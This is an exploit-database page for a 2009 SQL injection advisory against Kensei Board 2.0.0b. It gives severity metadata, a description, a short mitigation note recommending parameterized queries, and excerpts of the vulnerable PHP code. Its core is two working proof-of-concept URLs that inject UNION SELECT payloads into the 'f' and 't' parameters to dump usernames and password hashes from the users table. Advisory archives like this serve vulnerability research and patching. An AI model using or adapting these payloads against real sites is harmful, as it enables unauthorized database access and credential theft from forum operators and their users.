Kensei Board - exploit.company

vendor:

Kensei Board

by:

cOndemned

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Kensei Board

Affected Version From: 2.0.0b

Affected Version To: 2.0.0b

Patch Exists: NO

Related CWE: N/A

CPE: a:kensei_board:kensei_board

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Kensei Board <= 2.0.0b Multiple Remote SQL Injection Vulnerabilities

Kensei Board version 2.0.0b is vulnerable to multiple remote SQL injection vulnerabilities. The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'f' and 't' parameters to '/index.php' and '/functions/showforum.php' scripts. A remote attacker can execute arbitrary SQL commands in application's database, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, etc. Proof of Concept code is available.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should use parameterized queries (prepared statements) when interacting with the database.

Source

Exploit-DB raw data:

Kensei Board <= 2.0.0b Multiple Remote SQL Injection Vulnerabilities
Bug found && Exploited by cOndemned
Greetz: SELECT * FROM `friends`

Download Script : http://www.kenseiboard.com/counter/click.php?id=2

---

source of index.php :

	[...]

	87.	if ($inc_function == "_showforum") {

	88.		if ($_GET[t] == "") {

	89.			$inc_function = "functions/showforum.php";

	90.		} else {

	91.			$inc_function = "functions/showtopic.php";

	[...]

source of functions/showforum.php :

	[...]

	9.	$forum = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]forums where forums_id = $_GET[f]"));

	[...]

It looks the same for "t" variable ...

---

Proof of Concept :

	"f" variable: /index.php?&act=showforum&f=1+and+1=51+union+select+1,2,3,concat_ws(char(58),users_username,users_password),5,6,7,8+from+ksb_users--
	"t" variable: /index.php?&act=showforum&f=1&t=1+and+1=51+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(char(58),users_username,users_password)+from+ksb_users--

---

// http://www.youtube.com/watch?v=xCMlZxqZ5xI

# milw0rm.com [2009-05-26]